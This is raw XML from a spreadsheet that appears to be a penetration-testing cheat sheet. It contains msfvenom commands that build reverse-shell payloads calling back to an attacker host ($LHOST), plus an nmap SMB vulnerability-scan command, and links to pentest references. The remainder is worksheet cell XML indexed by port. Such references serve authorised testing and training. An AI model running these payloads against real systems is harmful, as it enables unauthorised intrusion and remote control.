    <t>msfvenom -p cmd/unix/reverse_bash LHOST=$LHOST LPORT=$LPORT -f raw &gt; shell.sh</t>
  </si>
  <si>
    <t>msfvenom -p cmd/unix/reverse_perl LHOST=$LHOST LPORT=$LPORT -f raw &gt; shell.pl</t>
  </si>
  <si>
    <t>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f &lt;language&gt;</t>
  </si>
  <si>
    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f &lt;language&gt;</t>
  </si>
  <si>
    <t>msfvenom -p osx/x86/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f &lt;language&gt;</t>
  </si>
  <si>
    <t>Advanced -  in Screen with excludes file</t>
  </si>
  <si>
    <t>Advanced - uses parralells</t>
  </si>
  <si>
    <t>nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 -oA nmap_smb -iL $TARGETFILE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</si>
</sst>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1"/>
    <xf numFmtId="0" fontId="3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ook.hacktricks.xyz/windows/active-directory-methodology/asreproas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adcoms.github.io/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maldevel/PenTestKit" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xapax.gitbooks.io/security/content/list_of_common_ports.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/frizb/OSCP-Survival-Gui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3BF46-D00A-42E6-B508-DA76C17C20ED}">
  <sheetPr filterMode="1"/>
  <dimension ref="A1:I255"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="B1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A73" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" activeCell="G109" sqref="G109"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="14.5703125" customWidth="1"/>
    <col min="2" max="2" width="20.85546875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="46.7109375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="9.42578125" customWidth="1"/>
    <col min="5" max="5" width="7" style="1" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="9.7109375" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="170.85546875" customWidth="1"/>
    <col min="8" max="8" width="78" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" s="7" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>47</v>
      </c>
      <c r="E1" s="6" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="5" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="2" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>30</v>
      </c>
      <c r="B2" t="s">
        <v>10</v>
      </c>
      <c r="C2" t="s">
        <v>13</v>
      </c>
      <c r="D2" t="s">
        <v>8</v>
      </c>
      <c r="E2" s="1">
        <v>21</v>
      </c>
      <c r="F2" t="s">
        <v>9</v>
      </c>
      <c r="G2" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="3" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>30</v>
      </c>
      <c r="B3" t="s">
        <v>43</v>
      </c>
      <c r="C3" t="s">
        <v>148</v>
      </c>
      <c r="D3" t="s">
        <v>8</v>
      </c>
      <c r="E3" s="1">
        <v>21</v>
      </c>
      <c r="F3" t="s">
        <v>9</v>
      </c>
      <c r="G3" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="4" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>30</v>
      </c>
      <c r="B4" t="s">
        <v>508</v>
      </c>
      <c r="C4" t="s">
        <v>509</v>
      </c>
      <c r="D4" t="s">
        <v>8</v>
      </c>
      <c r="E4" s="1">
        <v>21</v>
      </c>
      <c r="F4" t="s">
        <v>9</v>
      </c>
      <c r="G4" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="5" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>68</v>
      </c>
      <c r="B5" t="s">
        <v>161</v>
      </c>
      <c r="C5" t="s">
        <v>162</v>
      </c>
      <c r="D5" t="s">
        <v>8</v>
      </c>
      <c r="E5" s="1">
        <v>22</v>
      </c>
      <c r="F5" t="s">
        <v>11</v>
      </c>
      <c r="G5" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="6" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>68</v>
      </c>
      <c r="B6" t="s">
        <v>267</v>
      </c>
      <c r="C6" t="s">
        <v>268</v>
      </c>
      <c r="D6" t="s">
        <v>8</v>
      </c>
      <c r="E6" s="1">
        <v>22</v>
      </c>
      <c r="F6" t="s">
        <v>11</v>
      </c>
      <c r="G6" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="7" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>68</v>
      </c>
      <c r="B7" t="s">
        <v>271</v>
      </c>
      <c r="C7" t="s">
        <v>272</v>
      </c>
      <c r="D7" t="s">
        <v>8</v>
      </c>
      <c r="E7" s="1">
        <v>22</v>
      </c>
      <c r="F7" t="s">
        <v>11</v>
      </c>
      <c r="G7" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="8" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>68</v>
      </c>
      <c r="B8" t="s">
        <v>275</v>
      </c>
      <c r="C8" t="s">
        <v>274</v>
      </c>
      <c r="D8" t="s">
        <v>8</v>
      </c>
      <c r="E8" s="1">
        <v>22</v>
      </c>
      <c r="F8" t="s">
        <v>11</v>
      </c>
      <c r="G8" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="9" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>30</v>
      </c>
      <c r="B9" t="s">
        <v>10</v>
      </c>
      <c r="C9" t="s">
        <v>33</v>
      </c>
      <c r="D9" t="s">
        <v>8</v>
      </c>
      <c r="E9" s="1">
        <v>22</v>
      </c>
      <c r="F9" t="s">
        <v>11</v>
      </c>
      <c r="G9" t="s">
        <v>64</v>
      </c>
      <c r="I9">
        <f t="shared" ref="I9:I16" si="0">SUM(E9:H9)</f>
        <v>22</v>
      </c>
    </row>
    <row r="10" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>30</v>
      </c>
      <c r="B10" t="s">
        <v>32</v>
      </c>
      <c r="C10" t="s">
        <v>63</v>
      </c>
      <c r="D10" t="s">
        <v>8</v>
      </c>
      <c r="E10" s="1">
        <v>22</v>
      </c>
      <c r="F10" t="s">
        <v>11</v>
      </c>
      <c r="G10" t="s">
        <v>62</v>
      </c>
      <c r="I10">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="11" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>30</v>
      </c>
      <c r="B11" t="s">
        <v>43</v>
      </c>
      <c r="C11" t="s">
        <v>153</v>
      </c>
      <c r="D11" t="s">
        <v>8</v>
      </c>
      <c r="E11" s="1">
        <v>22</v>
      </c>
      <c r="F11" t="s">
        <v>11</v>
      </c>
      <c r="G11" t="s">
        <v>243</v>
      </c>
      <c r="I11">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="12" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>30</v>
      </c>
      <c r="B12" t="s">
        <v>10</v>
      </c>
      <c r="C12" t="s">
        <v>258</v>
      </c>
      <c r="D12" t="s">
        <v>8</v>
      </c>
      <c r="E12" s="1">
        <v>22</v>
      </c>
      <c r="F12" t="s">
        <v>11</v>
      </c>
      <c r="G12" t="s">
        <v>259</v>
      </c>
      <c r="I12">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="13" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>30</v>
      </c>
      <c r="B13" t="s">
        <v>10</v>
      </c>
      <c r="C13" t="s">
        <v>260</v>
      </c>
      <c r="D13" t="s">
        <v>8</v>
      </c>
      <c r="E13" s="1">
        <v>22</v>
      </c>
      <c r="F13" t="s">
        <v>11</v>
      </c>
      <c r="G13" t="s">
        <v>261</v>
      </c>
      <c r="I13">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="14" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>30</v>
      </c>
      <c r="B14" t="s">
        <v>10</v>
      </c>
      <c r="C14" t="s">
        <v>263</v>
      </c>
      <c r="D14" t="s">
        <v>8</v>
      </c>
      <c r="E14" s="1">
        <v>22</v>
      </c>
      <c r="F14" t="s">
        <v>11</v>
      </c>
      <c r="G14" t="s">
        <v>262</v>
      </c>
      <c r="I14">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="15" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>30</v>
      </c>
      <c r="B15" t="s">
        <v>32</v>
      </c>
      <c r="C15" t="s">
        <v>599</v>
      </c>
      <c r="D15" t="s">
        <v>8</v>
      </c>
      <c r="E15" s="1">
        <v>22</v>
      </c>
      <c r="F15" t="s">
        <v>11</v>
      </c>
      <c r="G15" t="s">
        <v>598</v>
      </c>
      <c r="I15">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="16" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>251</v>
      </c>
      <c r="B16" t="s">
        <v>249</v>
      </c>
      <c r="C16" t="s">
        <v>250</v>
      </c>
      <c r="D16" t="s">
        <v>8</v>
      </c>
      <c r="E16" s="1">
        <v>22</v>
      </c>
      <c r="F16" t="s">
        <v>11</v>
      </c>
      <c r="G16" t="s">
        <v>248</v>
      </c>
      <c r="I16">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
    </row>
    <row r="17" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A17" t="s">
        <v>251</v>
      </c>
      <c r="B17" t="s">
        <v>265</v>
      </c>
      <c r="C17" t="s">
        <v>266</v>
      </c>
      <c r="D17" t="s">
        <v>8</v>
      </c>
      <c r="E17" s="1">
        <v>22</v>
      </c>
      <c r="F17" t="s">
        <v>11</v>
      </c>
      <c r="G17" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="18" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>251</v>
      </c>
      <c r="B18" t="s">
        <v>10</v>
      </c>
      <c r="C18" t="s">
        <v>640</v>
      </c>
      <c r="D18" t="s">
        <v>8</v>
      </c>
      <c r="E18" s="1">
        <v>22</v>
      </c>
      <c r="F18" t="s">
        <v>11</v>
      </c>
      <c r="G18" t="s">
        <v>641</v>
      </c>
      <c r="I18">
        <f>SUM(E18:H18)</f>
        <v>22</v>
      </c>
    </row>
    <row r="19" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A19" t="s">
        <v>30</v>
      </c>
      <c r="B19" t="s">
        <v>278</v>
      </c>
      <c r="C19" t="s">
        <v>277</v>
      </c>
      <c r="D19" t="s">
        <v>8</v>
      </c>
      <c r="E19" s="1">
        <v>23</v>
      </c>
      <c r="F19" t="s">
        <v>278</v>
      </c>
      <c r="G19" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="20" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>68</v>
      </c>
      <c r="B20" t="s">
        <v>184</v>
      </c>
      <c r="C20" t="s">
        <v>185</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E20" s="1">
        <v>25</v>
      </c>
      <c r="F20" t="s">
        <v>144</v>
      </c>
      <c r="G20" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="21" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A21" t="s">
        <v>30</v>
      </c>
      <c r="B21" t="s">
        <v>10</v>
      </c>
      <c r="C21" t="s">
        <v>145</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E21" s="1">
        <v>25</v>
      </c>
      <c r="F21" t="s">
        <v>144</v>
      </c>
      <c r="G21" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="22" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A22" t="s">
        <v>30</v>
      </c>
      <c r="B22" t="s">
        <v>10</v>
      </c>
      <c r="C22" t="s">
        <v>279</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E22" s="1">
        <v>25</v>
      </c>
      <c r="F22" t="s">
        <v>144</v>
      </c>
      <c r="G22" t="s">
        <v>624</v>
      </c>
    </row>
    <row r="23" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A23" t="s">
        <v>30</v>
      </c>
      <c r="B23" t="s">
        <v>43</v>
      </c>
      <c r="C23" t="s">
        <v>281</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E23" s="1">
        <v>25</v>
      </c>
      <c r="F23" t="s">
        <v>144</v>
      </c>
      <c r="G23" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="24" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A24" t="s">
        <v>30</v>
      </c>
      <c r="B24" t="s">
        <v>10</v>
      </c>
      <c r="C24" t="s">
        <v>625</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E24" s="1">
        <v>25</v>
      </c>
      <c r="F24" t="s">
        <v>144</v>
      </c>
      <c r="G24" t="s">
        <v>626</v>
      </c>
    </row>
    <row r="25" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A25" t="s">
        <v>30</v>
      </c>
      <c r="B25" t="s">
        <v>282</v>
      </c>
      <c r="C25" t="s">
        <v>286</v>
      </c>
      <c r="D25" t="s">
        <v>8</v>
      </c>
      <c r="E25" s="1">
        <v>43</v>
      </c>
      <c r="F25" t="s">
        <v>282</v>
      </c>
      <c r="G25" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="26" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A26" t="s">
        <v>30</v>
      </c>
      <c r="B26" t="s">
        <v>118</v>
      </c>
      <c r="C26" t="s">
        <v>119</v>
      </c>
      <c r="D26" t="s">
        <v>133</v>
      </c>
      <c r="E26" s="1">
        <v>53</v>
      </c>
      <c r="F26" t="s">
        <v>117</v>
      </c>
      <c r="G26" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="27" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A27" t="s">
        <v>30</v>
      </c>
      <c r="B27" t="s">
        <v>118</v>
      </c>
      <c r="C27" t="s">
        <v>121</v>
      </c>
      <c r="D27" t="s">
        <v>133</v>
      </c>
      <c r="E27" s="1">
        <v>53</v>
      </c>
      <c r="F27" t="s">
        <v>117</v>
      </c>
      <c r="G27" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="28" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A28" t="s">
        <v>30</v>
      </c>
      <c r="B28" t="s">
        <v>118</v>
      </c>
      <c r="C28" t="s">
        <v>120</v>
      </c>
      <c r="D28" t="s">
        <v>133</v>
      </c>
      <c r="E28" s="1">
        <v>53</v>
      </c>
      <c r="F28" t="s">
        <v>117</v>
      </c>
      <c r="G28" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="29" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A29" t="s">
        <v>30</v>
      </c>
      <c r="B29" t="s">
        <v>118</v>
      </c>
      <c r="C29" t="s">
        <v>122</v>
      </c>
      <c r="D29" t="s">
        <v>133</v>
      </c>
      <c r="E29" s="1">
        <v>53</v>
      </c>
      <c r="F29" t="s">
        <v>117</v>
      </c>
      <c r="G29" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="30" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A30" t="s">
        <v>30</v>
      </c>
      <c r="B30" t="s">
        <v>118</v>
      </c>
      <c r="C30" t="s">
        <v>126</v>
      </c>
      <c r="D30" t="s">
        <v>133</v>
      </c>
      <c r="E30" s="1">
        <v>53</v>
      </c>
      <c r="F30" t="s">
        <v>117</v>
      </c>
      <c r="G30" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="31" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A31" t="s">
        <v>30</v>
      </c>
      <c r="B31" t="s">
        <v>118</v>
      </c>
      <c r="C31" t="s">
        <v>127</v>
      </c>
      <c r="D31" t="s">
        <v>133</v>
      </c>
      <c r="E31" s="1">
        <v>53</v>
      </c>
      <c r="F31" t="s">
        <v>117</v>
      </c>
      <c r="G31" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="32" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A32" t="s">
        <v>30</v>
      </c>
      <c r="B32" t="s">
        <v>118</v>
      </c>
      <c r="C32" t="s">
        <v>128</v>
      </c>
      <c r="D32" t="s">
        <v>133</v>
      </c>
      <c r="E32" s="1">
        <v>53</v>
      </c>
      <c r="F32" t="s">
        <v>117</v>
      </c>
      <c r="G32" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="33" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A33" t="s">
        <v>30</v>
      </c>
      <c r="B33" t="s">
        <v>118</v>
      </c>
      <c r="C33" t="s">
        <v>129</v>
      </c>
      <c r="D33" t="s">
        <v>133</v>
      </c>
      <c r="E33" s="1">
        <v>53</v>
      </c>
      <c r="F33" t="s">
        <v>117</v>
      </c>
      <c r="G33" t="s">
        <v>215</v>
      </c>
    </row>
    <row r="34" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A34" t="s">
        <v>30</v>
      </c>
      <c r="B34" t="s">
        <v>118</v>
      </c>
      <c r="C34" t="s">
        <v>131</v>
      </c>
      <c r="D34" t="s">
        <v>133</v>
      </c>
      <c r="E34" s="1">
        <v>53</v>
      </c>
      <c r="F34" t="s">
        <v>117</v>
      </c>
      <c r="G34" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="35" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A35" t="s">
        <v>30</v>
      </c>
      <c r="B35" t="s">
        <v>118</v>
      </c>
      <c r="C35" t="s">
        <v>132</v>
      </c>
      <c r="D35" t="s">
        <v>133</v>
      </c>
      <c r="E35" s="1">
        <v>53</v>
      </c>
      <c r="F35" t="s">
        <v>117</v>
      </c>
      <c r="G35" t="s">
        <v>142</v>
      </c>
    </row>
    <row r="36" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A36" t="s">
        <v>30</v>
      </c>
      <c r="B36" t="s">
        <v>222</v>
      </c>
      <c r="C36" t="s">
        <v>221</v>
      </c>
      <c r="D36" t="s">
        <v>133</v>
      </c>
      <c r="E36" s="1">
        <v>53</v>
      </c>
      <c r="F36" t="s">
        <v>117</v>
      </c>
      <c r="G36" t="s">
        <v>220</v>
      </c>
    </row>
    <row r="37" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A37" t="s">
        <v>30</v>
      </c>
      <c r="B37" t="s">
        <v>118</v>
      </c>
      <c r="C37" t="s">
        <v>574</v>
      </c>
      <c r="E37" s="1">
        <v>53</v>
      </c>
      <c r="F37" t="s">
        <v>117</v>
      </c>
      <c r="G37" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="38" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A38" t="s">
        <v>30</v>
      </c>
      <c r="B38" t="s">
        <v>284</v>
      </c>
      <c r="C38" t="s">
        <v>285</v>
      </c>
      <c r="D38" t="s">
        <v>20</v>
      </c>
      <c r="E38" s="1">
        <v>69</v>
      </c>
      <c r="F38" t="s">
        <v>284</v>
      </c>
      <c r="G38" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="39" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A39" t="s">
        <v>68</v>
      </c>
      <c r="B39" t="s">
        <v>312</v>
      </c>
      <c r="C39" t="s">
        <v>313</v>
      </c>
      <c r="D39" t="s">
        <v>8</v>
      </c>
      <c r="E39" s="1">
        <v>79</v>
      </c>
      <c r="F39" t="s">
        <v>288</v>
      </c>
      <c r="G39" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="40" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A40" t="s">
        <v>30</v>
      </c>
      <c r="B40" t="s">
        <v>288</v>
      </c>
      <c r="C40" t="s">
        <v>290</v>
      </c>
      <c r="D40" t="s">
        <v>8</v>
      </c>
      <c r="E40" s="1">
        <v>79</v>
      </c>
      <c r="F40" t="s">
        <v>288</v>
      </c>
      <c r="G40" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="41" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A41" t="s">
        <v>30</v>
      </c>
      <c r="B41" t="s">
        <v>288</v>
      </c>
      <c r="C41" t="s">
        <v>291</v>
      </c>
      <c r="D41" t="s">
        <v>8</v>
      </c>
      <c r="E41" s="1">
        <v>79</v>
      </c>
      <c r="F41" t="s">
        <v>288</v>
      </c>
      <c r="G41" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="42" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A42" t="s">
        <v>332</v>
      </c>
      <c r="B42" t="s">
        <v>333</v>
      </c>
      <c r="C42" t="s">
        <v>335</v>
      </c>
      <c r="D42" t="s">
        <v>8</v>
      </c>
      <c r="E42" s="1">
        <v>88</v>
      </c>
      <c r="F42" t="s">
        <v>134</v>
      </c>
      <c r="G42" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="43" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A43" t="s">
        <v>332</v>
      </c>
      <c r="B43" t="s">
        <v>333</v>
      </c>
      <c r="C43" t="s">
        <v>337</v>
      </c>
      <c r="D43" t="s">
        <v>8</v>
      </c>
      <c r="E43" s="1">
        <v>88</v>
      </c>
      <c r="F43" t="s">
        <v>134</v>
      </c>
      <c r="G43" t="s">
        <v>336</v>
      </c>
      <c r="I43">
        <f>SUM(E43:H43)</f>
        <v>88</v>
      </c>
    </row>
    <row r="44" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A44" t="s">
        <v>30</v>
      </c>
      <c r="B44" t="s">
        <v>143</v>
      </c>
      <c r="C44" t="s">
        <v>239</v>
      </c>
      <c r="D44" t="s">
        <v>133</v>
      </c>
      <c r="E44" s="1">
        <v>88</v>
      </c>
      <c r="F44" t="s">
        <v>134</v>
      </c>
      <c r="G44" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="45" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A45" t="s">
        <v>30</v>
      </c>
      <c r="B45" t="s">
        <v>10</v>
      </c>
      <c r="C45" t="s">
        <v>315</v>
      </c>
      <c r="D45" t="s">
        <v>8</v>
      </c>
      <c r="E45" s="1">
        <v>88</v>
      </c>
      <c r="F45" t="s">
        <v>134</v>
      </c>
      <c r="G45" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="46" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A46" t="s">
        <v>30</v>
      </c>
      <c r="B46" t="s">
        <v>143</v>
      </c>
      <c r="C46" t="s">
        <v>317</v>
      </c>
      <c r="D46" t="s">
        <v>8</v>
      </c>
      <c r="E46" s="1">
        <v>88</v>
      </c>
      <c r="F46" t="s">
        <v>134</v>
      </c>
      <c r="G46" t="s">
        <v>316</v>
      </c>
      <c r="H46" t="s">
        <v>511</v>
      </c>
      <c r="I46">
        <f t="shared" ref="I46:I71" si="1">SUM(E46:H46)</f>
        <v>88</v>
      </c>
    </row>
    <row r="47" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A47" t="s">
        <v>30</v>
      </c>
      <c r="B47" t="s">
        <v>143</v>
      </c>
      <c r="C47" t="s">
        <v>319</v>
      </c>
      <c r="D47" t="s">
        <v>8</v>
      </c>
      <c r="E47" s="1">
        <v>88</v>
      </c>
      <c r="F47" t="s">
        <v>134</v>
      </c>
      <c r="G47" t="s">
        <v>318</v>
      </c>
      <c r="H47" s="3" t="s">
        <v>321</v>
      </c>
      <c r="I47">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="48" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A48" t="s">
        <v>30</v>
      </c>
      <c r="B48" t="s">
        <v>143</v>
      </c>
      <c r="C48" t="s">
        <v>325</v>
      </c>
      <c r="D48" t="s">
        <v>8</v>
      </c>
      <c r="E48" s="1">
        <v>88</v>
      </c>
      <c r="F48" t="s">
        <v>134</v>
      </c>
      <c r="G48" t="s">
        <v>322</v>
      </c>
      <c r="I48">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="49" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A49" t="s">
        <v>30</v>
      </c>
      <c r="B49" t="s">
        <v>143</v>
      </c>
      <c r="C49" t="s">
        <v>324</v>
      </c>
      <c r="D49" t="s">
        <v>8</v>
      </c>
      <c r="E49" s="1">
        <v>88</v>
      </c>
      <c r="F49" t="s">
        <v>134</v>
      </c>
      <c r="G49" t="s">
        <v>323</v>
      </c>
      <c r="I49">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="50" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A50" t="s">
        <v>30</v>
      </c>
      <c r="B50" t="s">
        <v>143</v>
      </c>
      <c r="C50" t="s">
        <v>329</v>
      </c>
      <c r="D50" t="s">
        <v>8</v>
      </c>
      <c r="E50" s="1">
        <v>88</v>
      </c>
      <c r="F50" t="s">
        <v>134</v>
      </c>
      <c r="G50" t="s">
        <v>326</v>
      </c>
      <c r="I50">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="51" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A51" t="s">
        <v>30</v>
      </c>
      <c r="B51" t="s">
        <v>143</v>
      </c>
      <c r="C51" t="s">
        <v>331</v>
      </c>
      <c r="D51" t="s">
        <v>8</v>
      </c>
      <c r="E51" s="1">
        <v>88</v>
      </c>
      <c r="F51" t="s">
        <v>134</v>
      </c>
      <c r="G51" t="s">
        <v>327</v>
      </c>
      <c r="I51">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="52" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A52" t="s">
        <v>30</v>
      </c>
      <c r="B52" t="s">
        <v>143</v>
      </c>
      <c r="C52" t="s">
        <v>330</v>
      </c>
      <c r="D52" t="s">
        <v>8</v>
      </c>
      <c r="E52" s="1">
        <v>88</v>
      </c>
      <c r="F52" t="s">
        <v>134</v>
      </c>
      <c r="G52" t="s">
        <v>328</v>
      </c>
      <c r="I52">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="53" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A53" t="s">
        <v>30</v>
      </c>
      <c r="B53" t="s">
        <v>571</v>
      </c>
      <c r="C53" t="s">
        <v>570</v>
      </c>
      <c r="D53" t="s">
        <v>8</v>
      </c>
      <c r="E53" s="1">
        <v>88</v>
      </c>
      <c r="F53" t="s">
        <v>134</v>
      </c>
      <c r="G53" t="s">
        <v>569</v>
      </c>
      <c r="I53">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
    </row>
    <row r="54" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A54" t="s">
        <v>30</v>
      </c>
      <c r="B54" t="s">
        <v>10</v>
      </c>
      <c r="C54" t="s">
        <v>573</v>
      </c>
      <c r="D54" t="s">
        <v>8</v>
      </c>
      <c r="E54" s="1">
        <v>88</v>
